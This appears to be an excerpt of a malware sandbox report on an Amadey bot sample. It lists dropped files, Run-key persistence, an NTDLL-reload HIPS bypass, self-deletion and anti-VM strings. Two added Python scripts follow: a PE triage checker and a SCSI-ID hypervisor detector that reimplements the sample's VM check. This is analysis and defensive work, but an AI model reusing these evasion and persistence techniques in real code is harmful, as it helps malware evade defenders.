Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E54 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E63 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402665 push cs; ret 24_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_0040290C push eax; iretd 24_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E16 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DC0 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DD8 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DE8 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402DF1 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E82 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E85 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402D92 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E95 push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00401D9A pushad ; ret 24_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_00402E9C push eax; ret 24_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4CD0D1 push ecx; ret 24_2_6B4CD0E4
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040B550 push eax; ret 25_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040B50D push ecx; ret 25_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\A557.exe Code function: 29_2_002DCF50 push ss; ret 29_2_002DCF51
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_0040B550 push eax; ret 30_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_0040B550 push eax; ret 30_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_0040B50D push ecx; ret 30_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B61AB1 push ds; retf 33_2_02B61AB9
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B628C4 push esp; iretd 33_2_02B628C5
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B62728 push ds; retf 33_2_02B6272C
Source: C:\Users\user\AppData\Local\Temp\B084.exe Code function: 33_2_02B61614 push edx; iretd 33_2_02B61622
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0040BDAD push eax; retn 0040h 34_2_0040BDC7
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_00410F16 push ecx; ret 34_2_00410F29
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_00427590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00427590
Binary contains a suspicious time stamp
Source: 77DC.exe.6.dr Static PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
PE file contains sections with non-standard names
Source: cnv622JnZv.exe Static PE information: section name: .mehepek
Source: 8615.exe.6.dr Static PE information: section name: .cipizi
Source: 2E26.exe.6.dr Static PE information: section name: .MPRESS1
Source: 2E26.exe.6.dr Static PE information: section name: .MPRESS2
Source: B084.exe.6.dr Static PE information: section name: .daya
Source: C5EA.exe.6.dr Static PE information: section name: .lufulac
Source: 152F.exe.6.dr Static PE information: section name: .rulofiv
Source: jejhieg.6.dr Static PE information: section name: .mehepek
Source: bejhieg.6.dr Static PE information: section name: .cipizi
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .MPRESS2
PE file contains an invalid checksum
Source: A557.exe.6.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: 977B.exe.6.dr Static PE information: real checksum: 0x0 should be: 0xdd7bb
Source: 66A4.exe.6.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: initial sample Static PE information: section name: .text entropy: 7.00461715058
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 6.98189062284
Source: initial sample Static PE information: section name: .text entropy: 7.87137605191
Source: initial sample Static PE information: section name: .text entropy: 6.99265157433
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.66944674948
Source: initial sample Static PE information: section name: .text entropy: 7.00461715058
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
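The static indicators listed in this block (a stored checksum that does not match the computed one, a timestamp in 2044, section names like .mehepek and .cipizi, an entry point inside .MPRESS2, .text entropy between 7.0 and 7.9, and the writable+executable .text:EW seen after unpacking) are all cheap to recompute without a sandbox. The following is an added example and not code from the report or from Joe Sandbox: a stand-alone Python checker that parses PE headers with struct, implements the PE checksum algorithm (16-bit sum with end-around carry, skipping the CheckSum field, plus file length) and runs the checks over a PE constructed in build_pe(). That constructed file borrows the report's values (timestamp 0x8B87D1F5, stored checksum 0, a .mehepek section) but is not any of the dropped files; REFERENCE_NOW is an assumed analysis date.

```python
"""Static PE triage for the indicators listed above: checksum, timestamp,
section names, entry-point section, W+X sections and section entropy.
Added example, not code from the report or from Joe Sandbox. Pure struct
parsing of PE headers; the only input is a PE built by build_pe() that borrows
the report's values (timestamp 0x8B87D1F5, checksum 0, .mehepek) and is not a real sample."""
import math, struct
from collections import Counter, namedtuple

EXEC, WRITE = 0x20000000, 0x80000000          # IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_WRITE
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".pdata", ".bss", ".tls", ".CRT", "CODE", "DATA"}
REFERENCE_NOW = 1635000000   # late Oct 2021, assumed date of the analysis
Section = namedtuple("Section", "name vaddr vsize rawptr rawsize chars")
PEInfo = namedtuple("PEInfo", "timestamp stored_checksum checksum_off entry_rva sections")

def parse_pe(data: bytes) -> PEInfo:
    """Read just the header fields the checks need (PE32 or PE32+ layout)."""
    pe = struct.unpack_from("<I", data, 0x3C)[0] if data[:2] == b"MZ" else -1
    if pe < 0 or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff, opt = pe + 4, pe + 24                 # COFF header, then optional header
    nsec, timestamp = struct.unpack_from("<HI", data, coff + 2)
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64                     # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    secs = []
    for i in range(nsec):                       # 40-byte IMAGE_SECTION_HEADERs follow
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        secs.append(Section(f[0].rstrip(b"\0").decode("latin-1"), f[2], f[1], f[4], f[3], f[9]))
    return PEInfo(timestamp, stored, checksum_off, entry_rva, secs)

def pe_checksum(data: bytes, checksum_off: int) -> int:
    """imagehlp-style checksum: 16-bit sum with end-around carry over the file,
    skipping the 4-byte CheckSum field itself, plus the file length."""
    total, padded = 0, data + b"\0" * (len(data) % 2)
    for off in range(0, len(padded), 2):
        if checksum_off <= off < checksum_off + 4:
            continue
        total += int.from_bytes(padded[off:off + 2], "little")
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)

def entropy(buf: bytes) -> float:
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def triage_pe(data: bytes, now_ts: int = REFERENCE_NOW) -> list:
    """Return 'kind:detail' strings for every static indicator that fires."""
    info, out = parse_pe(data), []
    calc = pe_checksum(data, info.checksum_off)
    if info.stored_checksum != calc:              # "real checksum: 0x0 should be: 0xdd7bb"
        out.append(f"checksum_mismatch:stored=0x{info.stored_checksum:x},computed=0x{calc:x}")
    if info.timestamp == 0 or info.timestamp > now_ts:   # the 2044 stamp on 77DC.exe
        out.append(f"suspicious_timestamp:0x{info.timestamp:08X}")
    ep = next((s for s in info.sections
               if s.vaddr <= info.entry_rva < s.vaddr + max(s.vsize, s.rawsize)), None)
    if ep is None:
        out.append("entry_point_outside_sections")
    elif ep.name not in (".text", "CODE"):        # cf. entry point in .MPRESS2
        out.append(f"entry_point_in_nonstandard_section:{ep.name}")
    for s in info.sections:
        if s.name not in STANDARD_SECTIONS:       # .mehepek, .cipizi, .lufulac, ...
            out.append(f"nonstandard_section_name:{s.name}")
        if s.chars & EXEC and s.chars & WRITE:    # W+X in the file, cf. ".text:EW"
            out.append(f"writable_executable_section:{s.name}")
        ent = entropy(data[s.rawptr:s.rawptr + s.rawsize])
        if ent >= 7.0:                            # packed/encrypted, cf. .text entropy 7.0-7.9
            out.append(f"high_entropy_section:{s.name}={ent:.2f}")
    return out

def build_pe(sections, timestamp, checksum, entry_rva) -> bytes:
    """Constructed minimal PE32: just enough header to exercise the checks."""
    falign, salign, hdr = 0x200, 0x1000, 0x200
    hdrs, body, vaddr, rawptr = b"", b"", salign, hdr
    for name, content, chars in sections:
        rawsize = -(-len(content) // falign) * falign
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), len(content), vaddr,
                            rawsize, rawptr, 0, 0, 0, 0, chars)
        body += content.ljust(rawsize, b"\0")
        vaddr, rawptr = vaddr + -(-len(content) // salign) * salign, rawptr + rawsize
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBB9I6H4I2H4I2I", 0x10B, 14, 0, 0, 0, 0, entry_rva, salign, 0,
                      0x400000, salign, falign, 6, 0, 0, 0, 6, 0, 0, vaddr, hdr, checksum,
                      2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    return (dos + b"PE\0\0" + coff + opt + hdrs).ljust(hdr, b"\0") + body

CODE, IDATA, READ = 0x20, 0x40, 0x40000000
SAMPLE_SECTIONS = [                           # constructed, not taken from a real file
    (".text", bytes(range(256)) * 4, CODE | EXEC | READ),              # entropy 8.0 stands in for packed code
    (".mehepek", b"\x90" * 64 + b"\xC3", IDATA | EXEC | READ | WRITE),  # W+X, and holds the entry point
    (".rsrc", b"\0" * 300, IDATA | READ),
]
SAMPLE_PE = build_pe(SAMPLE_SECTIONS, timestamp=0x8B87D1F5, checksum=0, entry_rva=0x2000)

if __name__ == "__main__":
    print("\n".join(triage_pe(SAMPLE_PE)))
```

Two caveats when reading the output. A stored checksum of 0 is common in ordinary user-mode binaries (the linker fills the field only when asked to, or for drivers and system DLLs), so a mismatch with stored 0x0 like the one on 977B.exe is a weak signal by itself, while a non-zero stored value that does not match (A557.exe, 66A4.exe) means the file was modified after linking and is worth more. The W+X check looks at section flags in the file on disk; the .text:EW finding on 8615.exe above was observed at run time after the unpacker changed page protections, which static parsing cannot see.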

Persistence and Installation Behavior:

Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jejhieg Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\bejhieg Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\977B.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\bejhieg Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8615.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jejhieg Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\977B.exe File created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2E26.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C5EA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A557.exe File created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A557.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\66A4.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\152F.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8615.exe File created: C:\Users\user\AppData\Local\Temp\1105.tmp Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\77DC.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B084.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\977B.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
Source: C:\Users\user\AppData\Local\Temp\977B.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected
Source: C:\Users\user\AppData\Local\Temp\8615.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\cnv622jnzv.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\jejhieg:Zone.Identifier read attributes | delete Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 25_2_00408E31
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process information set: NOOPENFILEERRORBOX (41 identical events)
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Process information set: NOOPENFILEERRORBOX (50 identical events)
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX (8 identical events)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX (20 identical events)
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process information set: NOOPENFILEERRORBOX (41 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: 66A4.exe PID: 3536, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: C5EA.exe, 00000012.00000002.379102872.00000000006BB000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
Source: C:\Users\user\AppData\Local\Temp\B084.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 identical entries)
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\8615.exe File opened: C:\Windows\SysWOW64\ntdll.dll (2 identical entries)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\977B.exe TID: 5728 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\152F.exe TID: 4988 Thread sleep time: -90000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\977B.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 571
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 375
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A6B90 rdtsc 24_2_6B4A6B90
Source: C:\Users\user\AppData\Local\Temp\977B.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000006.00000000.294735709.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: explorer.exe, 00000006.00000000.295034386.0000000008AEA000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.281531555.0000000008C5B000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.270174093.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: vmware
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: VMwareVBoxARun using valid operating system
Source: 152F.exe, 00000023.00000003.505077428.0000000002EEE000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWL
Source: 152F.exe, 00000023.00000003.505458126.0000000002F11000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000000.269637468.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000006.00000000.309552971.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: explorer.exe, 00000006.00000000.270552390.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000006.00000000.309552971.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: 66A4.exe, 00000016.00000003.482381534.0000000006B8B000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_004040F0 RegCreateKeyExA,RegOpenKeyExA,GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetSystemMetrics, 34_2_004040F0
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 34_2_0041B9B2 FindFirstFileExW, 34_2_0041B9B2
Source: C:\Users\user\Desktop\cnv622JnZv.exe System information queried: ModuleInformation
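The SCSI enumeration listed above (HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI) and the device IDs recovered from process memory further down (Ven_NECVMWar&Prod_VMware_SATA_CD00, Ven_VMware&Prod_Virtual_disk, Ven_Msft&Prod_Virtual_DVD-ROM) are the two halves of one hypervisor check: the subkey names under Enum\SCSI carry the Ven_/Prod_ tokens of every SCSI device, and on the analysis host those tokens spell out the hypervisor. The Python below is an added example, not code from the sample or from the sandbox vendor. It parses device instance IDs in both the registry form (SCSI\...) and the device-interface form (\\?\SCSI#...#{GUID}) seen in the memory strings, classifies them against a token table that is an assumption (illustrative, not exhaustive), and on Windows walks the same registry key the sample enumerated. The sample IDs in the block are quoted from this report plus one constructed bare-metal disk as a negative control.

```python
r"""VM check via SCSI device-instance IDs: offline classifier plus optional live walk.

Added example, not code from the sample or the sandbox vendor.  HYPERVISOR_TOKENS
is an assumed, illustrative list; SAMPLE_IDS are quoted from the report except the
last, which is constructed.
"""
import re
import sys
from typing import Dict, List, Optional

try:
    import winreg  # stdlib, Windows only
except ImportError:
    winreg = None

HYPERVISOR_TOKENS = {
    "VMware":     ("vmware", "necvmwar"),
    "VirtualBox": ("vbox", "virtualbox"),
    "QEMU/KVM":   ("qemu", "virtio", "red_hat"),
    "Xen":        ("xen",),
    "Parallels":  ("parallels",),
}

SAMPLE_IDS = [
    r"SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000",
    r"SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000",
    r"\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    r"SCSI\Disk&Ven_SAMSUNG&Prod_SSD_860_EVO\4&2f1a3b4c&0&000000",  # constructed, real hardware
]

_DOS_DEVICE_PREFIX = re.compile(r"^\\\\\?\\")
_INTERFACE_GUID_SUFFIX = re.compile(r"[\\#]\{[0-9a-fA-F-]{36}\}$")


def normalise(device_id: str) -> str:
    r"""Map a device-interface path (\\?\SCSI#dev#inst#{GUID}) onto the registry
    form (SCSI\dev\inst); registry-form input passes through unchanged."""
    s = _DOS_DEVICE_PREFIX.sub("", device_id.strip())
    s = _INTERFACE_GUID_SUFFIX.sub("", s)
    return s.replace("#", "\\")


def parse_scsi_id(device_id: str) -> Optional[Dict[str, str]]:
    r"""Split 'SCSI\<class>&Ven_<v>&Prod_<p>\<instance>' into fields; other
    '&'-separated fields are ignored.  Returns None for non-SCSI enumerators."""
    parts = normalise(device_id).split("\\")
    if len(parts) < 2 or parts[0].upper() != "SCSI":
        return None
    fields = parts[1].split("&")
    info = {"class": fields[0], "vendor": "", "product": "",
            "instance": parts[2] if len(parts) > 2 else ""}
    for field in fields[1:]:
        lower = field.lower()
        if lower.startswith("ven_"):
            info["vendor"] = field[4:]
        elif lower.startswith("prod_"):
            info["product"] = field[5:]
    return info


def classify(device_id: str) -> Optional[str]:
    """Name the hypervisor a device ID betrays, or None if it looks like real hardware."""
    info = parse_scsi_id(device_id)
    if info is None:
        return None
    haystack = f"{info['vendor']} {info['product']}".lower()
    for name, tokens in HYPERVISOR_TOKENS.items():
        if any(token in haystack for token in tokens):
            return name
    # Ven_Msft&Prod_Virtual_* is a weak indicator: Hyper-V guests have it, but so
    # does any physical Windows box with an ISO mounted through Explorer.
    if info["vendor"].lower() == "msft" and "virtual" in info["product"].lower():
        return "Microsoft virtual device"
    return None


def audit(device_ids: List[str]) -> Dict[str, List[str]]:
    """Group the IDs that give a hypervisor away, keyed by hypervisor name."""
    findings: Dict[str, List[str]] = {}
    for device_id in device_ids:
        verdict = classify(device_id)
        if verdict:
            findings.setdefault(verdict, []).append(device_id)
    return findings


def _subkeys(key):
    index = 0
    while True:
        try:
            yield winreg.EnumKey(key, index)
        except OSError:  # ERROR_NO_MORE_ITEMS ends the enumeration
            return
        index += 1


def live_scsi_ids(control_set: str = "ControlSet001") -> List[str]:
    r"""Walk HKLM\SYSTEM\<control_set>\Enum\SCSI as the sample did (Windows only).
    The sample named ControlSet001 directly rather than going through the
    CurrentControlSet link, so rename device entries in every ControlSet00N
    present, not only the one CurrentControlSet points at."""
    if winreg is None:
        return []
    ids: List[str] = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, rf"SYSTEM\{control_set}\Enum\SCSI") as scsi:
        for device in _subkeys(scsi):
            with winreg.OpenKey(scsi, device) as device_key:
                ids.extend(rf"SCSI\{device}\{instance}" for instance in _subkeys(device_key))
    return ids


if __name__ == "__main__":
    ids = live_scsi_ids() if sys.platform == "win32" else SAMPLE_IDS
    for hypervisor, matches in audit(ids).items():
        print(hypervisor, *matches, sep="\n  ")
```

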